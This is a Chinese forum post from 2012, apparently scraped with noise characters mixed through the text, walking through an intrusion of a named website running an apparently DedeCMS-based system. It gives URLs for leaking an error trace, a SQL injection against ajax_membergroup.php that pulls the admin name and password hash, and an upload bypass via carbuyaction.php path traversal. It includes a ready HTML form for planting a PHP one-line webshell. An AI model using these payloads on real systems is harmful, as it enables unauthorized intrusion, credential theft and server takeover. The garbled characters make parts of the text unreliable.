①注入漏洞。
+ S/ k4 n& K2 j4 h这站 http://www.political-security.com// |% d/ E& k# x5 e# |4 [% ^% E
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
9 j+ L! R2 x1 h# z; Dwww.political-security.com/data/mysql_error_trace.inc 爆后台
3 x$ n9 z1 c. Q# X然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
% E2 d) u' [% I \) F然后写上语句
3 _; O) a8 U7 X: {查看管理员帐号
! |9 Z& u; N6 B6 k/ Z' l5 g- E( Zhttp://www.political-security.co ... &membergroup=@`
: x- |3 U1 J# r0 ?3 t- _1 O: s9 \! V
admin
! Y- {# u$ n2 B# N; _2 ~8 ~
: f7 C5 `+ k1 K9 G# t2 A查看管理员密码
" ]) f$ h3 p1 q2 s/ G) n8 c$ F+ x http://www.political-security.co ... &membergroup=@`
; h! l9 R% K, ]; u! p& P( L! O: J& L- Q( ]; f( @9 x
8d29b1ef9f8c5a5af4295 l& k5 F0 q% W$ C
) a, z/ Q3 N* b6 i查看管理员密码8 \% g4 g4 o0 ~( M1 B2 ~: l
5 |& c% R) N2 _, f
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
- q6 q$ d) P+ S+ q( R. S
# y, T* ^4 X! P9 M) I8d2' x, X. K5 R, B' r( Y3 ?6 r
9b1ef9f8c5a5af42
2 b. z9 h5 |$ Q6 `2 d: { d9" O8 @) [) X* @' h
& ?2 W, V2 w9 \: A2 M, }cmd5没解出来 只好测试第二个方法* ~* X9 p' R; ]+ F
+ T; N8 _9 Z1 L4 s
. Y8 X* g6 I9 _5 w1 k( N0 r: M②上传漏洞:
+ P2 M G6 t( X" G5 q* R
5 O; F5 ^, M! e, M只要登陆会员中心,然后访问页面链接
$ F' {) I* O' q“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
) }0 `$ Z0 u: M- F1 Z6 x! Y2 b6 Z
, V4 L7 D. r, ?+ b5 J如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”* Q" y5 A& H, n) n
* @* Q4 Z5 r: G, \ G9 q/ T! v, q
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm" A( j. \ ~2 R1 ^. \
# R* K: F# r. r8 A; D6 h
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
5 p& p, ^! w/ \6 v或者
- {' f' `" o6 R9 L7 w+ N即可上传成功 |
发表于 2012-9-13 10:56:59
收藏
支持
反对